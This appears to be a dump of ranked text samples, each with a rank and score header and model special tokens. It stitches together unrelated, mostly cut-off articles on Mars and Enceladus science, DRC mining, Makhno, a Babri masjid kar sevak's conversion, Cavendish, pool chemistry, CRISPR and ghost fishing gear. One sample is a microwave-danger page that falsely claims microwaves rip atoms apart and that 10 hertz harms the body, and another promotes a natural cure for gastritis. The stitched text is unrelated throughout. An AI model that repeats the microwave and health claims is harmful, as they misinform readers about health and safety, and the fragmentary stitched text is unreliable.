Amir’s well-wishers in Malegaon. Among those ringed around him are a mechanic, a fruit-vendor, some traders and the loquacious principal of a junior college inwith a penchant for the dramatic and for hijacking the conversation.Earlier that evening, Amir had addressed a gathering at theat Madhavpura. “Woh toh zameen ke neeche ki, aur aasman ke upar ki baate karte hain,” says one of his admiring audience.Meditations on the afterlife — and on the ethics of Islam and social conduct of Muslims — might dominate his talks, but Mohammed Amir is often at the pulpit because of the torturous chrysalis he has emerged from, he now says.Twenty-five years ago he was not Mohammad Amir but a certain Balbir Singh, and the highlight of his life until then was that he was among the handful of kar sevaks who had clambered up the dome of Babri masjid to strike the first blows. The same kar sevaks who were lionised by Bal Thackeray as his men.“I am a Rajput. I was born in a little village close to Panipat,” he discloses. “My father, Daulatram, was a school teacher and a man of deep Gandhian leaning. He had witnessed the horrors of Partition, and went out of his way to make the Muslims in our area feel secure. He had wanted me and my three elder brothers to do the same.”When he was ten, Balbir’s family moved from the village to Panipat so that the children could complete their secondary education. Panipat, he says, was a +================================================================================ +Rank = 75; Score = 724992.0 +<|begin_of_text|>Combattente nella rivoluzione ucraina. Osteggiato tanto dai reazionari “bianchi” quanto dai bolscevichi della rivoluzione russa, ed esponente di primo piano dell’Anarco-comunismo internazionale. + +Di estrazione contadina, le ristrettezze economiche familiari prima e la morte del padre poi, quando aveva solo dieci anni, lo obbligano ad intraprendere le prime esperienze lavorative, facendogli immediatamente scoprire l’ingiustizia sociale imperante nella Russia zarista. A dodici anni lascia la scuola ed inizia a lavorare a tempo pieno come contadino. A tredici anni, per la prima volta nella sua vita, reagisce con estrema violenza alla vista dei soprusi inflitti da un giovane padrone contro un lavoratore. Questa è la sua prima ribellione violenta documentata contro la classe padronale, a dimostrazione del suo carattere indomito, ribelle ed insofferente alle ingiustizie. + +A 16 anni entra a far parte di un gruppo formato da giovani rivoluzionari del luogo che sostenevano apertamente il comunismo libertario e si opponevano attraverso l’azione diretta all’oppressione classista. + +Dopo la pace di Brest-Litovsk, firmata da Lenin il 3 marzo 1918, che cedeva l’Ucraina alla Germania, le truppe germaniche invadono il Paese e lo occupano militarmente. Gli Anarchici si organizzano in un esercito di liberazione partigiano, mentre Makhno e una delegazione si recano nella Russia bolscevica al fine di ottenere la collaborazione e l’aiuto dei compagni Anarchici russi. + +Per contrastare l’invasore tedesco, Makhno forma l’armata Makhnovista, formata da battaglioni di contadini e operai per contrastare l’invasore tedesco. La Germania si ritirerà nel novembre 1918. + +Nello stesso periodo i libertari si trovano a dover affrontare la reazione della borghesia ucraina guidata da Den +================================================================================ +Rank = 76; Score = 712704.0 +<|begin_of_text|>The Mining industry of the Democratic Republic of the Congo is a significant factor in the world's production of cobalt, copper, diamond, tantalum, tin, and gold. It is the Democratic Republic of the Congo's largest source of export income. In 2009, the Democratic Republic of the Congo (DRC) had an estimated $24 trillion in untapped mineral deposits, including the world's largest reserves of coltan and significant quantities of the world's cobalt.[1][2] The United States Geological Survey estimates that the DRC has 1 million tons of lithium resources.[3] + +During the Second Congo War mass-scale looting of mineral assets by all combattant forces—Congolese, Rwandan, Ugandan and foreign civilians—took place. The small artisanal mining operations the fighters were robbing sometimes shut down afterwards and larger foreign businesses reduced operations as well. Following the peace accord in 2003, the focus returned to mining. Rebel groups supplied international corporations through unregulated mining by soldiers, locals organized by military commanders and by foreign nationals. The political framework was unstable. In 2009 the DRC signed a loan contract with the International Monetary Fund (IMF) for $12 billion of debt relief in 2010. The loan included trade conditions, such as liberalization of the diamond trade.[citation needed] At the end of 2012 the IMF suspended the last payments, because of a lack of transparency in the DRC's process for awarding mining contracts. The mining sector has since expanded, but commodity prices have declined and this has hampered the DRC's progress. + +Much mining has been done in small artisanal mining operations, sometimes known as Artisanal and Small-Scale Mining (ASM).[4] These small-scale mines are unregulated,[5] with high levels of child labor and workplace injury. They can occur within protected areas, and around endangered or threatened species. As of 2008 many ASM operations existed for minerals such as coltan.[citation needed] ASM operations employ a significant portion of the DRC's population; estimates range up to one fifth of the population, or 12.5 million people.[5] Problems stemming from artisanal mining include disruption of families, mining-related illnesses, environmental damage, child labor, prostitution and rape.[6][7] + +Mine tailings at a Lubumbashi copper mine. + +History [ edit ] + +Belgian Congo Katanga copper mine + +The history of mining in the Democratic Republic of the Congo begins with the birth of +================================================================================ +Rank = 77; Score = 708608.0 +<|begin_of_text|>Mars scientists today nominated eight enticing targets for NASA’s next rover, due for launch in 2020. More than 100 planetary scientists narrowed down a list of 21 sites with a vote at the conclusion of a 3-day workshop in Monrovia, California. The researchers were keen to find sites that could preserve signs of life in rocks which would be sampled by the rover and, they hope, eventually returned to Earth. + +The top vote getter was Jezero crater, which contains a relic river delta that could have concentrated and preserved organic molecules. “The appeal is twofold,” says Bethany Ehlmann, a planetary scientist at the California Institute of Technology (Caltech) in Pasadena. “Not only is there a delta, but the rocks upstream are varied and diverse.” + +Second on the list was Columbia Hills, a region explored by the rover Spirit before it expired in 2010. Spirit found silica deposits that may have been deposited by a hydrothermal system—one that could have nourished life billions of years ago. + +Several other favored sites sit at the edge of Isidis Basin, an impact structure that created deep troughs with significant carbonate deposits, which could help explain how Mars lost its once-thick carbon dioxide atmosphere. That atmosphere “was either lost to space, or it has to be sequestered down in the rock as carbonates,” Ehlmann says. “We can explore one of those paths.” + +The new $1.5 billion rover will be very similar to Curiosity, which has been exploring Gale crater since 2012. But there are key differences. The main one is that the 2020 rover is expected to drill and collect more than 30 pencil-sized rock cores to be stored in a sample “cache.” Later missions could then land a small rover that would fetch and deliver the cache to a rocket that would return the samples to Earth for analysis. + +The 2020 rover also has a slimmed down payload compared to Curiosity. It won’t have, for instance, a mass spectrometer analysis instrument of the type that has at times bogged down Curiosity. That should enable mission scientists to assemble a cache more quickly. The “sky crane” system, which delivered Curiosity to the surface, will also be used again, though engineers are considering enhancements that could allow zones of confident targeting to shrink by more than 50%, to ellipses as small as 13 kilometers by 7 kilometers. + +A new sample collection plan + +In recent months, mission planners have also shifted to +================================================================================ +Rank = 78; Score = 704512.0 +<|begin_of_text|>This article is about the song form. For other uses, see Paean (disambiguation) + +Not to be confused with Peon + +A paean () is a song or lyric poem expressing triumph or thanksgiving. In classical antiquity, it is usually performed by a chorus, but some examples seem intended for an individual voice (monody). It comes from the Greek παιάν (also παιήων or παιών), "song of triumph, any solemn song or chant." "Paeon" was also the name of a divine physician and an epithet of Apollo.[1] + +Etymology [ edit ] + +The basis of the word παιάν is *παιάϝων.[2] Its ultimate etymology is unclear. R. S. P. Beekes has suggested the meaning "who heals illnesses through magic," from *παῖϝα/*παϝία "blow", related to παίω "beat" (from Proto-Indo-European *ph 2 u-ie/o-) or παύω "withhold" (of uncertain etymology). He alternatively suggested that paian "may well be Pre-Greek."[3] + +Ancient Greek paean [ edit ] + +In Homer, Paeon[2] was the Greek physician of the gods. In Iliad V he heals the wounded Ares and Hades with his herbal lore. In time Paeon (or Paean) became an epithet of Apollo as a god capable of bringing disease and propitiated as a god of healing. Hesiod identifies Paeon as a separate god, and in later poetry Paeon is invoked independently as a health god. Later, Paean becomes an epithet of Asclepius, another healer-god.[4] + +The earliest appearances of a paean or hymn of thanksgiving also appear in the Iliad. After the prayer to avert evil from the Achaeans, a paean is sung. In an almost identical line (X.391) that suggests a formulaic expression, Achilles tells the Myrmidons to sing the paean after the death of Hector.[5] + +To discover the relation between Paean or Paeon, the healer-god, and paean in the sense of "song," it is necessary to identify the connection between ritual chant and the shaman's healing arts.[6] + +Previously, L. R. Farnell[7] had referred to the ancient association between the healing craft and +================================================================================ +Rank = 79; Score = 704512.0 +<|begin_of_text|>CLOSE Concerns about protocol on upcoming Asia trip? President Donald Trump's National Security adviser says his boss will use "whatever language he wants." (Nov. 2) AP + +President Trump (front, right) and Japanese Prime Minister Shinzo Abe (front, left) return in a golf cart after playing a round of golf at the Kasumigaseki Country Club Golf Course in Kawagoe, Saitama prefecture, outside Tokyo on November 5, 2017. (Photo11: Jim Watson, AFP/Getty Images) + +TOKYO – President Trump and Japan’s Prime Minister Shinzo Abe are waxing poetic about their round of golf together. + +The two leaders played Sunday with Japanese professional Hideki Matsuyama at a championship golf course outside of Tokyo. + +Trump posted a brief video on Twitter. He wrote: “Playing golf with Prime Minister Abe and Hideki Matsuyama, two wonderful people!” + +Playing golf with Prime Minister Abe and Hideki Matsuyama, two wonderful people! pic.twitter.com/vYLULe0o2K — Donald J. Trump (@realDonaldTrump) November 5, 2017 + +Abe also chimed in on Twitter. He said: “A round of golf with a marvelous friend (President Donald J. Trump), full of spirited conversation.” + +素晴らしい友人とのゴルフ。会話も弾みます。 + +A round of golf with a marvelous friend (President Donald J. Trump), full of spirited conversation. @realDonaldTrumppic.twitter.com/ZpMrWeWudW — 安倍晋三 (@AbeShinzo) November 5, 2017 + +Read or Share this story: https://usat.ly/2A9VxkR<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 80; Score = 700416.0 +<|begin_of_text|>Ammonia and organic compounds in icy plumes on one of Saturn's moons provide strong evidence for the existence of liquid water beneath the surface + +The idea that liquid water exists below the surface of one of Saturn’s moons has been given a boost thanks to researchers in the US and China who have detected ammonia, various organic compounds, and possibly argon in plumes of gas and ice particles that spew out of the moon’s south pole. + +The work should help scientists further understand the formation of this and other planetary bodies and keeps hope alive that Enceladus, Saturn’s sixth largest moon, might have the necessary components to support extraterrestrial life. + +When plumes of ice water were first observed erupting from Enceladus by NASA’s Cassini spacecraft in 2005, scientists immediately began to wonder if they were being propelled by liquid water present in the moon’s interior. Now, Jack Hunter Waite Jr and colleagues from the Southwest Research Institute in San Antonio, US, and a number of other institutions in the US and Taiwan have added to mounting evidence in support of this theory by analysing INMS (ion neutral mass spectrometer) data on the plumes’ gas constituents obtained from a recent Cassini flyby. + +’Our evidence [for liquid water] comes from the detection of ammonia which acts as an antifreeze and can lower the melting point of water ice,’ explains Jonathan Lunine, one of the paper’s co-authors and a planetary scientist at the University of Arizona in Tucson, US. + +Moreover, the team believe their analysis points to an abundance of an isotope of argon (40Ar) in the plumes. The most plausible explanation for its presence, they say, is that a fluid must be leaching either the 40Ar or its parent potassium out of the rock deep inside Enceladus’ interior. ’Ice doesn’t do that so it really should be liquid,’ adds Lunine. + +Growing support + +Last month, German scientists, led by Frank Postberg from the University of Heidelberg, put forward strong evidence for subsurface liquid water by publishing their discovery of sodium salts in Saturn’s outer-most ring which is thought to originate from Enceladus’ plume material. ’The two studies are complimentary and now, for the first time, we are getting an idea of the full picture of what’s happening on Enceladus,’ says Postberg. + +Also excited about the new findings is Dave Stegman from the University of Melbourne in Australia, who has previously hypothes +================================================================================ +Rank = 81; Score = 684032.0 +<|begin_of_text|>Physicists have long wondered whether hydrogen, the most abundant element in the universe, could be transformed into a metal and possibly even a superconductor -- the elusive state in which electrons can flow without resistance. + +They have speculated that under certain pressure and temperature conditions hydrogen could be squeezed into a metal and possibly even a superconductor, but proving it experimentally has been difficult. High-pressure researchers, including Carnegie's Ho-kwang (Dave) Mao, have now modeled three hydrogen-dense metal alloys and found there are pressure and temperature trends associated with the superconducting state -- a huge boost in the understanding of how this abundant material could be harnessed. + +The study is published in the January 25, 2010, early, on-line edition of the Proceedings of the National Academy of Sciences. + +All known materials have to be cooled below a very low, so-called, transition temperature to become superconducting, making them impractical for widespread application. Scientists have found that in addition to chemical manipulation to raise the transition temperature, superconductivity can also be induced by high pressure. Theoretical modeling is very helpful in defining the characteristics and pressures that can lead to high transition temperatures. In this study, the scientists modeled basic properties from first principles -- the study of behavior at the atomic level -- of three metal hydrides under specific temperature, pressure, and composition scenarios. Metal hydrides are compounds in which metals bind to an abundance of hydrogen in a lattice structure. The compounds were scandium trihydride (ScH 3 ), yttrium trihydride (YH 3 ) and lanthanum trihydride (LaH 3 ). + +"We found that superconductivity set in at pressures between roughly 100,000 to 200,000 times atmospheric pressure at sea level (10 to 20 GPa), which is an order of magnitude lower than the pressures for related compounds that bind with four hydrogens instead of three," remarked Mao, of Carnegie's Geophysical Laboratory. Lanthanum trihydride stabilized at about 100,000 atmospheres and a transition temperature of -- 423°F (20 Kelvin), while the other two stabilized at about 200,000 atmospheres and temperatures of -427 °F (18 K) and -387 °F (40 K) for ScH 3 and YH 3 respectively. + +The researchers also found that two of the compounds, LaH 3 and YH 3, had more similar distributions of vibrational energy to +================================================================================ +Rank = 82; Score = 684032.0 +<|begin_of_text|>[/caption] + +A new look at data from the Mars Viking landers concludes that the two landers may have found the building blocks of life on the Red Planet after all way back in 1976. The surprise discovery of perchlorates by the Phoenix mission on Mars 32 years later could mean the way the Viking experiment was set up actually would have destroyed any carbon-based chemical building blocks of life – what the experiment set about to try and find. + +“This doesn’t say anything about the question of whether or not life has existed on Mars, but it could make a big difference in how we look for evidence to answer that question,” said Chris McKay of NASA’s Ames Research Center. McKay coauthored a study published online by the Journal of Geophysical Research – Planets, reanalyzing results of Viking’s tests for organic chemicals in Martian soil. + +The Viking lander scooped up some soil, put it in a tiny oven and heated the sample. The only organic chemicals identified in the Martian soil from that experiment chloromethane and dichloromethane — chlorine compounds interpreted at the time as likely contaminants from cleaning fluids used on the spacecraft before it left Earth. But those chemicals are exactly what the new study found when a little perchlorate — the surprise finding from Phoenix — was added to desert soil from Chile containing organics and analyzed in the manner of the Viking tests. + +“Our results suggest that not only organics, but also perchlorate, may have been present in the soil at both Viking landing sites,” said the study’s lead author, Rafael Navarro-González of the National Autonomous University of Mexico, Mexico City. + +The Viking experiment results have been rather controversial over the years. There are some scientists who say the experiment actually did find evidence for life, and others who say the results were inconclusive. + +McKay said that organics can come from non-biological or biological sources. Many meteorites raining onto Mars and Earth for the past 5 billion years contain organics. Even if Mars has never had life, scientists before Viking anticipated that Martian soil would contain organics from meteorites. + +“The lack of organics was a big surprise from the Vikings,” McKay said. “But for 30 years we were looking at a jigsaw puzzle with a piece missing. Phoenix has provided the missing piece: perchlorate. The perchlorate discovery by Phoenix was one of the most important results from Mars since Viking.” Perchlorate, an ion of chlorine and oxygen, becomes a strong oxidant when heated. “ +================================================================================ +Rank = 83; Score = 684032.0 +<|begin_of_text|>Tratamiento Natural Para Curar la Gastritis 4.3 (85%) 8 votes (85%)votes + +Tratamiento Natural Para Curar la Gastritis + +Cada día más personas son afectadas en todo el mundo por la Gastritis. Esta enfermedad demuestra la mala alimentación que tenemos y sobre todo un estilo de vida estresante en el que no disfrutamos del tiempo que tenemos. Todo esto afecta negativamente a nuestro cuerpo haciéndole mucho daño, causando en muchos casos afecciones que antes no teníamos diagnosticadas y que solo se daban por la aparición de alguna infección por bacterias o gérmenes. + +El estómago es el órgano dónde se realiza la digestión de los alimentos gracias a la secreción de jugos gástricos que disuelven lo que hemos comido para que sea mucho más fácil absorber las vitaminas y minerales por el intestino delgado. + +Este órgano, para proteger sus paredes de los ácidos corrosivos de los que están compuestos los jugos gástricos, tiene una capa de mucosidad gástrica que evita dicha acción. Cuando esta capa se debilita, los ácidos inflaman e irritan las paredes estomacales creando lo que llamamos gastritis, la cual se puede curar de forma natural con el adecuado tratamiento. + +La Gastritis es una enfermedad muy común y se ha contabilizado que al menos un 10% de la población la sufren o la han sufrido alguna vez en su vida. + +Causas naturales de la gastritis + +Una de las principales causas es la infección por una bacteria llamada Helicobacter Pylori. Dicha bacteria incide sobre la mucosa gástrica produciendole un daño, de esta manera los ácidos penetran y dañan las paredes del estómago. Este parásito es el causante de un 80% de los casos de úlceras duodenales y gástricas. + +La mala alimentación y los malos hábitos son una de las principales causa debido a la vida estresada que estamos llevando. La comida con grasa, con abundantes fritos, muy procesada o pesada hace trabajar al +================================================================================ +Rank = 84; Score = 679936.0 +<|begin_of_text|>For other people named Henry Cavendish, see Henry Cavendish (disambiguation) + +Henry Cavendish FRS (; 10 October 1731 – 24 February 1810) was an English natural philosopher, scientist, and an important experimental and theoretical chemist and physicist. He is noted for his discovery of hydrogen, which he termed "inflammable air".[1] He described the density of inflammable air, which formed water on combustion, in a 1766 paper, On Factitious Airs. Antoine Lavoisier later reproduced Cavendish's experiment and gave the element its name. + +A notoriously shy man (it has been postulated that he had what is now called childhood autism in the ICD-10),[2] Cavendish was nonetheless distinguished for great accuracy and precision in his researches into the composition of atmospheric air, the properties of different gases, the synthesis of water, the law governing electrical attraction and repulsion, a mechanical theory of heat, and calculations of the density (and hence the mass) of the Earth. His experiment to measure the density of the Earth has come to be known as the Cavendish experiment. + +Biography [ edit ] + +Early life [ edit ] + +Henry Cavendish was born on 10 October 1731 in Nice, where his family was living at the time. His mother was Lady Anne de Grey, fourth daughter of Henry Grey, 1st Duke of Kent, and his father was Lord Charles Cavendish, the third son of William Cavendish, 2nd Duke of Devonshire. The family traced its lineage across eight centuries to Norman times, and was closely connected to many aristocratic families of Great Britain. Henry's mother died in 1733, three months after the birth of her second son, Frederick, and shortly before Henry's second birthday, leaving Lord Charles Cavendish to bring up his two sons. + +From the age of 11 Henry attended Newcome's School, a private school near London. At the age of 18 (on 24 November 1748) he entered the University of Cambridge in St Peter's College, now known as Peterhouse, but left three years later on 23 February 1751 without taking a degree (at the time, a common practice).[3][4] He then lived with his father in London, where he soon had his own laboratory. + +Lord Charles Cavendish spent his life firstly in politics and then increasingly in science, especially in the Royal Society +================================================================================ +Rank = 85; Score = 679936.0 +<|begin_of_text|>Microwave Facts + +Microwaves are radio waves with frequencies ranging from around 300 million cycles per second (300 MHz) to 3 GHz. RF. A standard measure of exposure for microwave energy is the Specific Absorption Rate (SAR) or rate of tissue energy absorption measured in watts per kilogram of tissue. + +Microwave radiation leakage can damage human cells and tissues. + +All appliances working on electricity produce a toxic electromagnetic field (EMF) of approximately 60 hertz. This is over and above potential microwave leakage from appliances or devices. + +Microwave ovens can leak + +Microwave leakage is serious enough that the FDA sets strict limits on it for the manufacturers. But once door seals age, leaking tends to exceed those limits, often at head level. That’s bad news, because the microwave energy inside a microwave oven is massive! + +Frequency inside your microwave 2.45 BILLION hertz. + +Frequency shown to start harming the human body: over 10 hertz + +That’s 2.45 billion vs. 10 hertz. It doesn’t take very big leak for the damage to begin. (One top culprit: aging door seals) + +The facts about microwaves & cataracts + +Eyes are especially vulnerable to microwaves. That’s because unlike other areas of the body, they lack the blood vessels to dissipate the heat and cellular stress. + +The first suspected clinical case of microwave-caused cataracts was reported by Hirsch and Parker as early as 1950's. (Sulman 1980). + +For decades, cataracts have been reported in workers exposed to this type of radiation. (On the back of the lens where radiation cataracts usually occur.) + +What do microwaves do to food? + +In a microwave oven, alternating current forces atoms reverse polarity at a startlingly high rate. This creates such violent friction that the water inside the food molecules begin to vibrate and heat up. + +The dangers of microwaved foods. + +Microwaves break chemical and molecular bonds, and can literally rip atoms apart, disrupting the basic biochemical structures of life. It’s no wonder foods cooked in such a way become so harmful to consume.Government and industry studies suggest they pose no threat, but a growing body of knowledge now contradicts those claims. + +Microwaved foods lose nutrition. + +The Swiss scientist Hans Hertel, was the first to study microwave dangers, specifically, how cooking degrades and depletes food of nutrients—an effect that shows up in study participants' blood samples. + + +================================================================================ +Rank = 86; Score = 679936.0 +<|begin_of_text|>Currently, Mars has a thin atmosphere dominated by carbon dioxide, with pressures at most of the planet's surface so low that liquid water will immediately boil. But a variety of features we've discovered argue that the planet has once supported copious amounts of water, indicating that the planet's atmosphere must have differed considerably in the past. Using radar data from the Mars Reconnaissance Orbiter, scientists have now found a potential resting place for some material that was once in the Martian atmosphere: a huge deposit at the south pole that holds nearly as much CO 2 as the planet's current atmosphere. + +Mars' south pole has extensive ice deposits, but most of that material is thought to be water, with only a thin coating of carbon dioxide on top. However, the MRO's radar instrument identified several reflection-free zones, where most of the radar signal went entirely through the icy material to the planet's surface itself. Based on the authors' calculations, this can't be water ice, but it does have very similar reflective properties to dry ice, or frozen carbon dioxide. The area also has features that indicate that some of the dry ice has sublimated to a gaseous form, resulting in areas where the surface has collapsed. + +If the area is dry ice, then the total amount present is huge. The authors estimate the total volume of the non-reflective material at somewhere between 9,500 and 12,500 cubic kilometers. That's 30 times more than had previously been estimated to reside at the poles, and is about 80 percent of the current CO 2 content of the entire atmosphere. If all the dry ice were heated up, Mars' atmospheric pressure would nearly double. + +Like the Earth, Mars undergoes orbital variations that alter the distribution of sunlight across the planet. One of these involves changes in the orientation of its axis of rotation relative to the plane of its orbit, called the obliquity. Mars undergoes more dramatic changes in obliquity than Earth and, as a result, its poles see more significant changes in sunlight at the extreme. The authors argue that this can help explain why the reflection-free zones lack any material from the planet's famous dust storms, which should reflect the radar effectively. + +Mars' atmosphere needs to be above a certain density to support the particles that make up its dust storms. As the poles undergo extended cold periods, the authors suggest "the atmosphere collapses onto the polar caps." So much of the planet's dry ice winds up frozen at the poles that the atmosphere becomes even thinner than +================================================================================ +Rank = 87; Score = 675840.0 +<|begin_of_text|>July 2006 + +Introduction + +A whiff of pool water - often described as the smell of chlorine -can stir happy thoughts of summer. If strong enough, however, "pool smell" can signify a source of irritation to the eyes, lungs and skin of swimmers. + +Pool smell is due, not to chlorine, but to chloramines, chemical compounds that build up in pool water when it is improperly treated. + +Chloramines result from the combination of two ingredients: (a) chlorine disinfectants and (b) perspiration, oils and urine that enter pools on the bodies of swimmers. Chlorine disinfectants are added to pool water to destroy germs that can give swimmers diarrhea, ear aches and athlete's foot. Perspiration, oils and urine, however, are unwanted additions to pool water. By showering before entering the pool, and washing these substances from the skin, swimmers can help minimize pool smell. + +The Chemistry of Pool Smell + +When chlorine disinfectants are added to water, two chemicals are unleashed that destroy waterborne germs: hypochlorous acid, HOCl, and hypochlorite ion, OCl-. A measure of the chlorine in these two chemicals is known as "free available chlorine" or FAC. Pool operators manage the FAC level of pool water for the safety of swimmers. Their challenge comes from the fact that FAC is reduced when it reacts with perspiration, oils and urine from swimmers to form chloramines. + +Three hydrogen ions are found + +at the corners of the base of + +this pyramid-shaped molecule, + +with nitrogen at the top. + +One way that chloramines are formed in pool water is by the reaction of hypochlorous acid with ammonia. Ammonia, NH 3, is a component of sweat and urine. Its chemical structure is illustrated in the figure at the right. + +There are three chemical reactions that can occur when hypochlorous acid reacts with ammonia, each involving the replacement of hydrogen ions with chlorine ions. When one of ammonia's hydrogen ions is replaced with chlorine, monochloramine is formed: + +HOCl + NH 3 → NH 2 Cl + H 2 O + +Replacing one more hydrogen ion with chlorine produces dichloramine, + +HOCl + NH 2 Cl → NHCl 2 + H 2 O + +Finally, it is possible to replace all three of ammonia's hydrogen ions with chlorine to form trichloramine, also known as nitrogen trichloride: + +HOCl + NHCl +================================================================================ +Rank = 88; Score = 675840.0 +<|begin_of_text|>We’re standing on the threshold of extraordinary capability in synthetic biology. CRISPR-Cas9, the genome editing technique discovered in 2014, is at the forefront of this newfound potential for innovation. These advancements provide an opportunity to solve problems in food supply, disease, genetics, and—the most tantalizing and forbidden of prospects—modifying the human genome. Doing so would make us better, faster, stronger, more resilient, and more intelligent: it’s a chance to engineer ourselves at a faster rate than natural selection could ever dream. + +However, many experts warn of the dangers of these new capabilities. A vast torrent of money is flowing towards biotech startups, and the race to be first can encourage cutting corners. Researchers in 2017 resurrected an extinct strain of the horsepox virus. CRISPR may make it possible to create the bioweapons carefully safeguarded by the US and Russian governments, such as smallpox, or to take an existing disease, like Ebola, and modify it into an epidemiologist’s worst nightmare. + +With these mind-bending breakthroughs that seem like science fiction, it can be a near-impossible task to discern hype from reality. Yet this is a crucial task for our politicians—who are overwhelmingly not scientists—to undertake. How can we realistically assess the potential risks and rewards? Now, a new study combining researchers from the US and the UK, published recently in eLifeSciences, gives an expert perspective on 20 emerging issues in bioengineering. + +The researchers sorted the 20 developments into different time horizons: the next five years, the next decade, and more than a decade away. In the next five years, they anticipate breakthroughs in artificial photosynthesis. As plants can turn carbon dioxide into fuel, artificial photosynthesis could be crucial for the energy crisis and to tackle climate change. While any scheme to deploy carbon dioxide removal as a climate fix would have to be huge, recent studies have shown that artificial photosynthesis can reduce CO 2 more efficiently than plants and can convert it into methanol for fuel. + +We’re running out of farming space as the world’s population continues to grow; to feed the world, a new Green Revolution may be necessary. Enhancing natural photosynthesis through genetic modification may prove to be the answer, as the C4 gene is being engineered into rice. Since this gene could boost rice yields by up to 50 percent, and since rice provides hundreds of millions with most of their calories, it’s a huge potential development. + +The researchers also expect two major +================================================================================ +Rank = 89; Score = 663552.0 +<|begin_of_text|>Differences between martian meteorites and rocks examined by a NASA rover can be explained if Mars had an oxygen-rich atmosphere 4000 million years ago – well before the rise of atmospheric oxygen on Earth 2500m years ago. + +Scientists from Oxford University investigated the compositions of Martian meteorites found on Earth and data from NASA’s ‘Spirit’ rover that examined surface rocks in the Gusev crater on Mars. The fact that the surface rocks are five times richer in nickel than the meteorites was puzzling and had cast doubt on whether the meteorites are typical volcanic products of the red planet. + +‘What we have shown is that both meteorites and surface volcanic rocks are consistent with similar origins in the deep interior of Mars but that the surface rocks come from a more oxygen-rich environment, probably caused by recycling of oxygen-rich materials into the interior,’ said Professor Bernard Wood, of Oxford University’s Department of Earth Sciences, who led the research reported in this week’s Nature. + +‘This result is surprising because while the meteorites are geologically ‘young’, around 180 million to 1400 million years old, the Spirit rover was analysing a very old part of Mars, more than 3700 million years old.’ + +Whilst it is possible that the geological composition of Mars varies immensely from region to region the researchers believe that it is more likely that the differences arise through a process known as subduction – in which material is recycled into the interior. They suggest that the Martian surface was oxidised very early in the history of the planet and that, through subduction, this oxygen-rich material was drawn into the shallow interior and recycled back to the surface during eruptions 4000 million years ago. The meteorites, by contrast, are much younger volcanic rocks that emerged from deeper within the planet and so were less influenced by this process. + +Professor Wood said: ‘The implication is that Mars had an oxygen-rich atmosphere at a time, about 4000 million years ago, well before the rise of atmospheric oxygen on earth around 2500 million years ago. As oxidation is what gives Mars its distinctive colour it is likely that the ‘red planet’ was wet, warm and rusty billions of years before Earth’s atmosphere became oxygen rich.’ + +A report of the research, entitled ‘Volcanism on Mars controlled by early oxidation of the upper mantle’, is published in the journal Nature. The research was carried out by James Tuff, Dr Jon Wade, and Professor Bernard Wood at Oxford University’s Department of Earth Sciences and was supported by the Science and Technology Facilities +================================================================================ +Rank = 90; Score = 663552.0 +<|begin_of_text|>"Our oceans are an unsafe place to live." When I first read this quote on World Animal Protection's website I was very perplexed. How can this be? How can the oceans be an unsafe place to live? Well, after a little more fishing, I found the answer is even worse. I'll come back to this point later. + +The ocean is big, it's beautiful and it's the heart of our planet. It regulates the earth's climate, feeds hundreds of millions of people, is home to an abundance of wildlife and even gives us medicines to live longer, healthier lives. + +But probably the most important factor is that the ocean gives us the oxygen we need to breathe through the miracle of photosynthesis. We NEED the ocean to breathe, it's really that simple! In fact, marine plants give us terra-firma dwellers 70 per cent of the oxygen we need to live. And, even though we know this, we are still polluting the atmosphere so much that the temperature and chemistry of the oceans are changing. We see this change most noticeably in Australia's Great Barrier Reef where fish are deprived of oxygen and plankton are having a really tough time making their shells. All of this leads to the mass bleaching of coral reefs in the area. + +The situation is actually very dire, because along with what we are doing to the chemistry of the ocean, we are also making it a very unsafe place for marine life to live thanks to something called ghost gear. + +Ghost gear is discarded, lost and abandoned fishing gear that makes the ocean a death trap for marine animals and it's why World Animal Protection has launched the Sea Change campaign. + +We've all seen those heart breaking news stories about whales that become entangled and the courageous rescues that happen to try and save them. This is only a fraction of the impact ghost gear has on animals. This gear, which was designed to catch and kill animals, represents one of the biggest threats to sea life, accounts for about 10 per cent of the plastic garbage in the water and is found in every ocean and sea on the planet. It's a major problem that most people know very little about. + +"The United Nations 